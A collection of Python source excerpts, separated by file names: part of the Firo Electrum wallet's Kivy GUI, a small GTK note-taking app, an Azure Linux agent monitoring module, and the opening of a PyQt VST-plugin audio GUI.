except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in duffs/kB
return format_fee_satoshis(fee_rate) + ' sat/kB'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Firo Electrum', message,
app_icon=icon, app_name='Firo Electrum')
except ImportError:
self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
@property
def testnet(self):
return self.electrum_config.get('testnet')
@property
def app_icon(self):
return ATLAS_ICON % ('logo-testnet' if self.testnet else 'logo')
def ps_icon(self, active=False, is_waiting=False):
if not active:
icon = 'privatesend'
elif not is_waiting:
icon = 'privatesend_active'
else:
icon = 'privatesend_waiting'
return ATLAS_ICON % icon
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, pr, on_complete):
status = False
if pr and pr.has_expired():
self.send_screen.payment_request = None
status, msg = False, _("Invoice has expired")
Clock.schedule_once(lambda dt: on_complete(status, msg))
return
need_broadcast = True if not pr or pr.need_broadcast_tx else False
txid = tx.txid()
try:
if need_broadcast:
coro = self.wallet.psman.broadcast_transaction(tx)
self.network.run_from_another_thread(coro)
else:
self.logger.info(f'Do not broadcast: {txid}, send bip70'
f' Payment msg to: {pr.payment_url}')
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except PSPossibleDoubleSpendError as e:
msg = str(e)
except PSSpendToPSAddressesError as e:
msg = str(e)
except BestEffortRequestFailed as e:
msg = repr(e)
else:
if pr:
self.send_screen.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
if need_broadcast:
status, msg = True, txid
else:
status, msg = ack_status, ack_msg
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, pr, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') +
':\n' + _('Electrum network not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
is_ps = getattr(screen, 'is_ps', None)
def amount_cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
if is_ps is None:
popup = AmountDialog(show_max, amount, cb=amount_cb)
else:
popup = AmountDialog(show_max, amount, is_ps=is_ps, cb=amount_cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
else:
self._addresses_dialog.update()
self._addresses_dialog.open()
def coins_dialog(self, filter_val=0):
from .uix.dialogs.coins_dialog import CoinsDialog
popup = CoinsDialog(self, filter_val=filter_val)
popup.update()
popup.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args, on_failure=None):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: on_failure(*args) if on_failure else None)
d.open()
else:
def q_callback(b):
if b:
f(*args, self.password)
elif on_failure:
on_failure(*args)
d = Question(
msg,
q_callback,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
backup_dir = util.android_backup_dir()
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def set_top_progress(self, value):
if 'top_prog_bar' in self.root.ids:
self.root.ids.top_prog_bar.value = value
def get_top_progress(self):
if 'top_prog_bar' in self.root.ids:
return self.root.ids.top_prog_bar.value
else:
return 100
def on_mn_list_updated(self, event, *args):
self._trigger_update_readiness()
def update_readiness(self, dt):
if self.get_top_progress() >= 100:
return
if self.network:
readiness = self.network.network_data_readiness()
else:
readiness = 0
self.set_top_progress(readiness)
|
note.py
|
#!/bin/python
from threading import Thread
import socket
import sys
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import GLib
from gi.repository import Gtk
from gi.repository import Gdk
PORT = 12347
HOST = "127.0.0.1"
def start_server(w):
def show_all(w):
w.show_all()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen()
try:
while True:
try:
conn, addr = s.accept()
data = conn.recv(1024)
GLib.idle_add(show_all, w)
except socket.error:
continue
except KeyboardInterrupt:
conn.close()
def check_already_running() -> bool:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((HOST, PORT))
return True
except Exception as e:
return False
def main():
def gui() -> Gtk.Window:
def quit(_w):
Gtk.main_quit()
def hide(win, ev):
keyname = Gdk.keyval_name(ev.keyval)
if keyname == "Escape":
win.hide()
t = Gtk.TextView()
w = Gtk.Window()
w.maximize()
w.add(t)
w.connect("destroy", quit)
w.connect("key-press-event", hide)
w.show_all()
return w
def style():
css = b'''
textview text {
background-color: #eafba1;
}
textview {
font-size: 28px;
}
'''
css_provider = Gtk.CssProvider()
css_provider.load_from_data(css)
context = Gtk.StyleContext()
screen = Gdk.Screen.get_default()
context.add_provider_for_screen(
screen, css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
def start_server_or_exit(window) -> bool:
if check_already_running():
sys.exit()
else:
server = Thread(target=start_server, args=(window,))
server.start()
window = gui()
start_server_or_exit(window)
style()
Gtk.main()
if __name__ == "__main__":
main()
|
monitor.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import threading
import uuid
import azurelinuxagent.common.logger as logger
import azurelinuxagent.common.utils.networkutil as networkutil
from azurelinuxagent.common.cgroupconfigurator import CGroupConfigurator
from azurelinuxagent.common.cgroupstelemetry import CGroupsTelemetry
from azurelinuxagent.common.errorstate import ErrorState
from azurelinuxagent.common.event import add_event, WALAEventOperation, report_metric
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
from azurelinuxagent.common.osutil import get_osutil
from azurelinuxagent.common.protocol.healthservice import HealthService
from azurelinuxagent.common.protocol.imds import get_imds_client
from azurelinuxagent.common.protocol.util import get_protocol_util
from azurelinuxagent.common.utils.restutil import IOErrorCounter
from azurelinuxagent.common.utils.textutil import hash_strings
from azurelinuxagent.common.version import AGENT_NAME, CURRENT_VERSION
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
def get_monitor_handler():
return MonitorHandler()
class PollResourceUsageOperation(PeriodicOperation):
"""
Periodic operation to poll the tracked cgroups for resource usage data.
It also checks whether there are processes in the agent's cgroup that should not be there.
"""
def __init__(self):
super(PollResourceUsageOperation, self).__init__(
name="poll resource usage",
operation=self._operation_impl,
period=datetime.timedelta(minutes=5))
self._last_error = None
self._error_count = 0
def _operation_impl(self):
#
# Check the processes in the agent cgroup
#
processes_check_error = None
try:
processes = CGroupConfigurator.get_instance().get_processes_in_agent_cgroup()
if processes is not None:
unexpected_processes = []
for (_, command_line) in processes:
if not CGroupConfigurator.is_agent_process(command_line):
unexpected_processes.append(command_line)
if unexpected_processes:
unexpected_processes.sort()
processes_check_error = "The agent's cgroup includes unexpected processes: {0}".format(ustr(unexpected_processes))
except Exception as exception:
processes_check_error = "Failed to check the processes in the agent's cgroup: {0}".format(ustr(exception))
# Report a small sample of errors
if processes_check_error != self._last_error and self._error_count < 5:
self._error_count += 1
self._last_error = processes_check_error
logger.info(processes_check_error)
add_event(op=WALAEventOperation.CGroupsDebug, message=processes_check_error)
#
# Report metrics
#
metrics = CGroupsTelemetry.poll_all_tracked()
for metric in metrics:
report_metric(metric.category, metric.counter, metric.instance, metric.value)
class ResetPeriodicLogMessagesOperation(PeriodicOperation):
"""
Periodic operation to clean up the hash-tables maintained by the loggers. For reference, please check
azurelinuxagent.common.logger.Logger and azurelinuxagent.common.event.EventLogger classes
"""
def __init__(self):
super(ResetPeriodicLogMessagesOperation, self).__init__(
name="reset periodic log messages",
operation=ResetPeriodicLogMessagesOperation._operation_impl,
period=datetime.timedelta(hours=12))
@staticmethod
def _operation_impl():
logger.reset_periodic()
class ReportNetworkErrorsOperation(PeriodicOperation):
def __init__(self):
super(ReportNetworkErrorsOperation, self).__init__(
name="report network errors",
operation=ReportNetworkErrorsOperation._operation_impl,
period=datetime.timedelta(minutes=30))
@staticmethod
def _operation_impl():
io_errors = IOErrorCounter.get_and_reset()
hostplugin_errors = io_errors.get("hostplugin")
protocol_errors = io_errors.get("protocol")
other_errors = io_errors.get("other")
if hostplugin_errors > 0 or protocol_errors > 0 or other_errors > 0:
msg = "hostplugin:{0};protocol:{1};other:{2}".format(hostplugin_errors, protocol_errors, other_errors)
add_event(op=WALAEventOperation.HttpErrors, message=msg)
class ReportNetworkConfigurationChangesOperation(PeriodicOperation):
"""
Periodic operation to check and log changes in network configuration.
"""
def __init__(self):
super(ReportNetworkConfigurationChangesOperation, self).__init__(
name="report network configuration changes",
operation=self._operation_impl,
period=datetime.timedelta(minutes=1))
self.osutil = get_osutil()
self.last_route_table_hash = b''
self.last_nic_state = {}
def _operation_impl(self):
raw_route_list = self.osutil.read_route_table()
digest = hash_strings(raw_route_list)
if digest != self.last_route_table_hash:
self.last_route_table_hash = digest
route_list = self.osutil.get_list_of_routes(raw_route_list)
logger.info("Route table: [{0}]".format(",".join(map(networkutil.RouteEntry.to_json, route_list))))
nic_state = self.osutil.get_nic_state()
if nic_state != self.last_nic_state:
description = "Initial" if self.last_nic_state == {} else "Updated"
logger.info("{0} NIC state: [{1}]".format(description, ", ".join(map(str, nic_state.values()))))
self.last_nic_state = nic_state
class MonitorHandler(ThreadHandlerInterface): # pylint: disable=R0902
# telemetry
EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=1)
# host plugin
HOST_PLUGIN_HEARTBEAT_PERIOD = datetime.timedelta(minutes=1)
HOST_PLUGIN_HEALTH_PERIOD = datetime.timedelta(minutes=5)
# imds
IMDS_HEARTBEAT_PERIOD = datetime.timedelta(minutes=1)
IMDS_HEALTH_PERIOD = datetime.timedelta(minutes=3)
_THREAD_NAME = "MonitorHandler"
@staticmethod
def get_thread_name():
return MonitorHandler._THREAD_NAME
def __init__(self):
self.osutil = get_osutil()
self.imds_client = None
self.event_thread = None
self._periodic_operations = [
ResetPeriodicLogMessagesOperation(),
ReportNetworkErrorsOperation(),
PeriodicOperation("send_host_plugin_heartbeat", self.send_host_plugin_heartbeat, self.HOST_PLUGIN_HEARTBEAT_PERIOD),
PeriodicOperation("send_imds_heartbeat", self.send_imds_heartbeat, self.IMDS_HEARTBEAT_PERIOD),
ReportNetworkConfigurationChangesOperation(),
]
if CGroupConfigurator.get_instance().enabled():
self._periodic_operations.append(PollResourceUsageOperation())
self.protocol = None
self.protocol_util = None
self.health_service = None
self.should_run = True
self.heartbeat_id = str(uuid.uuid4()).upper()
self.host_plugin_errorstate = ErrorState(min_timedelta=MonitorHandler.HOST_PLUGIN_HEALTH_PERIOD)
self.imds_errorstate = ErrorState(min_timedelta=MonitorHandler.IMDS_HEALTH_PERIOD)
def run(self):
self.start()
def stop(self):
self.should_run = False
if self.is_alive():
self.join()
def join(self):
self.event_thread.join()
def stopped(self):
return not self.should_run
def init_protocols(self):
# The initialization of ProtocolUtil for the Monitor thread should be done within the thread itself rather
# than initializing it in the ExtHandler thread. This is done to avoid any concurrency issues as each
# thread would now have its own ProtocolUtil object as per the SingletonPerThread model.
self.protocol_util = get_protocol_util()
self.protocol = self.protocol_util.get_protocol()
self.health_service = HealthService(self.protocol.get_endpoint())
def init_imds_client(self):
wireserver_endpoint = self.protocol_util.get_wireserver_endpoint()
self.imds_client = get_imds_client(wireserver_endpoint)
def is_alive(self):
return self.event_thread is not None and self.event_thread.is_alive()
def start(self):
self.event_thread = threading.Thread(target=self.daemon)
self.event_thread.setDaemon(True)
self.event_thread.setName(self.get_thread_name())
self.event_thread.start()
def daemon(self):
try:
if self.protocol_util is None or self.protocol is None:
self.init_protocols()
if self.imds_client is None:
self.init_imds_client()
while not self.stopped():
try:
self.protocol.update_host_plugin_from_goal_state()
for op in self._periodic_operations: # pylint: disable=C0103
op.run()
except Exception as e: # pylint: disable=C0103
logger.error("An error occurred in the monitor thread main loop; will skip the current iteration.\n{0}", ustr(e))
finally:
PeriodicOperation.sleep_until_next_operation(self._periodic_operations)
except Exception as e: # pylint: disable=C0103
logger.error("An error occurred in the monitor thread; will exit the thread.\n{0}", ustr(e))
def send_imds_heartbeat(self):
"""
Send a health signal every IMDS_HEARTBEAT_PERIOD. The signal is 'Healthy' when we have
successfully called and validated a response in the last IMDS_HEALTH_PERIOD.
"""
try:
is_currently_healthy, response = self.imds_client.validate()
if is_currently_healthy:
self.imds_errorstate.reset()
else:
self.imds_errorstate.incr()
is_healthy = self.imds_errorstate.is_triggered() is False
logger.verbose("IMDS health: {0} [{1}]", is_healthy, response)
self.health_service.report_imds_status(is_healthy, response)
except Exception as e: # pylint: disable=C0103
msg = "Exception sending imds heartbeat: {0}".format(ustr(e))
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.ImdsHeartbeat,
is_success=False,
message=msg,
log_event=False)
def send_host_plugin_heartbeat(self):
"""
Send a health signal every HOST_PLUGIN_HEARTBEAT_PERIOD. The signal is 'Healthy' when we have been able to
communicate with HostGAPlugin at least once in the last HOST_PLUGIN_HEALTH_PERIOD.
"""
try:
host_plugin = self.protocol.client.get_host_plugin()
host_plugin.ensure_initialized()
is_currently_healthy = host_plugin.get_health()
if is_currently_healthy:
self.host_plugin_errorstate.reset()
else:
self.host_plugin_errorstate.incr()
is_healthy = self.host_plugin_errorstate.is_triggered() is False
logger.verbose("HostGAPlugin health: {0}", is_healthy)
self.health_service.report_host_plugin_heartbeat(is_healthy)
if not is_healthy:
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HostPluginHeartbeatExtended,
is_success=False,
message='{0} since successful heartbeat'.format(self.host_plugin_errorstate.fail_time),
log_event=False)
except Exception as e: # pylint: disable=C0103
msg = "Exception sending host plugin heartbeat: {0}".format(ustr(e))
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HostPluginHeartbeat,
is_success=False,
message=msg,
log_event=False)
|
main.py
|
#!python3
import os
import sys
from time import time, sleep
import json
import logging
import threading
from queue import Queue
from multiprocessing import Pipe, freeze_support, current_process
from PyQt5 import QtWidgets, QtCore, QtGui, uic
from neil_vst_gui.ui_logging import MainLogHandler, ProcessLogEmitter
from neil_vst_gui.ui_settings import UI_Settings
from neil_vst_gui.main_worker import MainWorker
from neil_vst_gui.job import Job
from neil_vst_gui.play_chain import PlayPluginChain
from neil_vst_gui.rects_animate import RectsAnimate
import neil_vst_gui.resources
import soundfile
__version__ = '0.5.7'
class VSTPluginWindow(QtWidgets.QWidget):
def __init__(self, plugin, parent=None):
super(VSTPluginWindow, self).__init__(parent)
#
self.setWindowFlags(self.windowFlags() | QtCore.Qt.Dialog)
# set self window name
self.setWindowTitle(plugin.name)
# set self size corresponding to plugin size
rect = plugin.edit_get_rect()
self.resize(rect["right"], rect["bottom"])
# open plugin GUI to self
plugin.edit_open(int(self.winId()), self.gui_callback)
self.plugin = plugin
def closeEvent(self, event):
self.plugin.edit_close(int(self.winId()))
self.plugin = None
event.accept()
def gui_callback(self, event_str, plugin_p, index, value, ptr, opt):
if event_str == "audioMasterSizeWindow":
rect = self.plugin.edit_get_rect()
self.resize(rect["right"], rect["bottom"])
class neil_vst_gui_window(QtWidgets.QMainWindow):
logging_signal = QtCore.pyqtSignal(str, str)
progress_signal = QtCore.pyqtSignal(int)
ready_signal = QtCore.pyqtSignal()
# constructor
def __init__(self):
super().__init__()
# Create the MainThread logging
self._logger_init()
# Init UI
self._ui_init()
self.job = Job()
self.main_worker = MainWorker(logger=self.logger)
self.play_chain = PlayPluginChain(blocksize=1024, buffersize=10, logger=self.logger)
self.play_chain.progress_signal.connect(self.play_progress_update)
self.play_chain.stop_signal.connect(self.play_stop_slot)
# ---- connect signals/slots
self.action_open_job.triggered.connect(self._job_open)
self.action_save_job.triggered.connect(self._job_save)
self.action_show_logger_window.triggered.connect(self.dockWidget.show)
self.action_exit.triggered.connect(self._close_request)
#
self.button_add_files.clicked.connect(self._files_open_click)
# self.button_remove_selected_files.clicked.connect(self._files_remove_selected)
self.button_remove_all_files.clicked.connect(self._files_remove_all)
self.tool_button_out_folder.clicked.connect(self._files_out_folder_click)
#
self.button_add_vst.clicked.connect(self._plugin_add_click)
self.button_change_vst.clicked.connect(self._plugin_change_click)
self.table_widget_processes.itemDoubleClicked.connect(self._plugin_change_click)
self.button_vst_up_in_chain.clicked.connect(self._plugin_up_click)
self.button_vst_down_in_chain.clicked.connect(self._plugin_down_click)
self.button_remove_selected_vst.clicked.connect(self._plugin_remove_selected_click)
self.button_remove_all_vst.clicked.connect(self._plugin_remove_all)
#
self.button_play_start.clicked.connect(self.play_start_click)
self.button_play_stop.clicked.connect(self.play_stop_click)
self.table_widget_files.cellClicked.connect(self.play_selected)
self.horizontal_slider_play.sliderPressed.connect(self.play_position_change_start)
self.horizontal_slider_play.sliderReleased.connect(self.play_position_change_end)
#
self.button_start_work.clicked.connect(self.start_work_click)
self.button_measurment.clicked.connect(self.start_work_click)
self.button_stop_work.clicked.connect(self.stop_work_click)
#
self.tool_button_metadata_image.clicked.connect(self._tag_metadata_image_select_click)
#
self.progress_signal.connect(self._progress_slot)
self.ready_signal.connect(self.end_work)
#
self.dockWidget.dockLocationChanged.connect(self._dock_window_lock_changed)
#
self.combo_box_logging_level.currentIndexChanged.connect(self.logging_level_changed)
self.combo_box_logging_level.setCurrentIndex(1)
self.button_clear_log.clicked.connect(self.textBrowser.clear)
# window color style
self.actionLightStyle.triggered.connect(self._ui_style_set)
self.actionDarkStyle.triggered.connect(self._ui_style_set)
self._put_start_message()
# -------------------------------------------------------------------------
def _ui_init(self):
# main ui from default
self.uic = uic.loadUi(os.path.dirname(__file__) + '/main.ui', self)
# create the animate graphics before loading the UI settings
self.anim = RectsAnimate(210, 25, QtGui.QColor.fromRgb(0, 32, 49))
self.anim_2 = RectsAnimate(210, 25, QtGui.QColor.fromRgb(0, 32, 49))
self.horizontalLayout_2.insertWidget(1, self.anim.window)
self.horizontalLayout_2.insertWidget(8, self.anim_2.window)
# load UI settings
self._ui_load_settings()
# avaible sound devices list
import sounddevice
devices_list = [d['name'] for d in sounddevice.query_devices() if d['max_output_channels'] > 1]
self.combo_box_sound_device.addItems(devices_list)
# show self main window
self.show()
# update scene background after show the window
self.anim.scene.setBackgroundBrush(self.palette().color(QtGui.QPalette.Background))
self.anim_2.scene.setBackgroundBrush(self.palette().color(QtGui.QPalette.Background))
# create and start the UI thread
self.nqueue = Queue()
t = threading.Thread(target=self.ui_thread)
t.daemon = True # thread dies when main thread exits.
t.start()
def _ui_load_settings(self):
# create UI settings instance
self.ui_settings = UI_Settings(os.path.dirname(__file__) + "/ui_settings.json")
# open and parse json UI settings file
settings = self.ui_settings.load()
# main window
window_size = settings.get("main_window_size", [600, 800])
self.resize(window_size[0], window_size[1])
# set main window position
qr = self.frameGeometry()
cp = QtWidgets.QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
pos = settings.get("main_window_position", [qr.topLeft().x(), qr.topLeft().y()])
self.move(QtCore.QPoint(pos[0], pos[1]))
# global color style
self._ui_style_set(name=settings.get("theme_style", "Light"))
# dock widget (logging window)
self.dock_window_location = settings.get("dock_window_location", QtCore.Qt.BottomDockWidgetArea)
if self.dock_window_location == 0:
self.dockWidget.setFloating(True)
# dock window position
qr = self.dockWidget.frameGeometry()
cp = QtWidgets.QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
pos = settings.get("dock_window_position", [qr.topLeft().x(), qr.topLeft().y()])
self.dockWidget.move(QtCore.QPoint(pos[0], pos[1]))
else:
self.addDockWidget(self.dock_window_location, self.dockWidget);
# dock widget window size
window_size = settings.get("dock_window_size", [600, 300])
self.dockWidget.resize(window_size[0], window_size[1])
self.resizeDocks({self.dockWidget}, {window_size[0]}, QtCore.Qt.Horizontal);
self.resizeDocks({self.dockWidget}, {window_size[1]}, QtCore.Qt.Vertical);
if not settings.get("dock_window_visible", True):
self.dockWidget.close()
# tabs tables
columns_width = settings.get("table_files_columns", [500, 32, 100])
for i in range(len(columns_width)):
self.table_widget_files.setColumnWidth(i, columns_width[i])
